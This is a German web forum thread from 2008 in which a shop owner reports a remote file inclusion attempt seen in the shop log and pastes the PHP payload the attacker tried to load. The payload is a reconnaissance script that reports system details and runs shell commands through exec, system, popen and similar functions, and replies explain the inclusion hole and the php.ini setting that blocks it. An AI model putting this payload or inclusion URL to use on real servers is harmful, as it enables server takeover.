Hackversuch ?!?!

Grisu77 · #1 (**permalink**) 29.07.2008, 18:31

Hab eben beim WHO IS ONLINE folgendes gefunden :
00:09:19 0 Guest 74.55.183.82 19:19:18 19:19:18 /shop/index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt??

Jemand versucht aus dem Shop die Seite (oben) auszuführen ...

Rauskommen tut bei der txt.datei folgendes (was ist das ??) :

<?
$dir = @getcwd();
echo "Mic22 ";
$ker = @php_uname();
$OS = @PHP_OS;
echo "OSTYPE:$OS ";
echo " Kernel:$ker ";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)." ";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}

}

exit;

#2 (**permalink**) 30.07.2008, 00:42

Das ist ein üblich Eintrag, funktioniert beim aktuellen Shop aber nicht.

Entwarnung.

tuvalu

Outpack · #3 (**permalink**) 30.07.2008, 01:35

das kommt davon, wenn fopen zugelassen ist (php.ini)

Grisu77 · #4 (**permalink**) 30.07.2008, 07:58

Was bedeutet das ?!

Outpack · #5 (**permalink**) 30.07.2008, 11:18

Zitat:

Zitat von Grisu77

Was bedeutet das ?!

da kann ein String an ein php Script angehängt werden, was
(wenn vom System erlaubt) obige Befehle (popen, exec, etc.) ausführt.

hubbabubba · #6 (**permalink**) 30.07.2008, 15:51

Zitat:

Zitat von Grisu77

Was bedeutet das ?!

Es gibt Sicherheitseinstellungen (php.ini) mit denen man dem php-interpreter verbieten kann Dateien, resp. Programmdateien, von fremden Servern herunterzuladen. Gelingt es einem Angreifer ein paar eigene Programmbefehle einzuschleusen und zu Ausführung zu bringen kann er mittels der o.g. Funktionalität komplette Fremdprogramme einschleusen die es ihm ermöglichen das System vollständig unter seine Kontrolle zu bringen.

Eben um dieses Einbruchsszenario im Grundsatz zu unterbinden gibt es diesen Schalter in den php-Konfigurationen. Solange keine regulären Anwendungen laufen welche das externe nachladen von Dateien erfordern sollte dies verboten sein.

mfg

Themen-Optionen
Druckbare Version zeigen Jemanden per E-Mail auf dieses Thema hinweisen
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln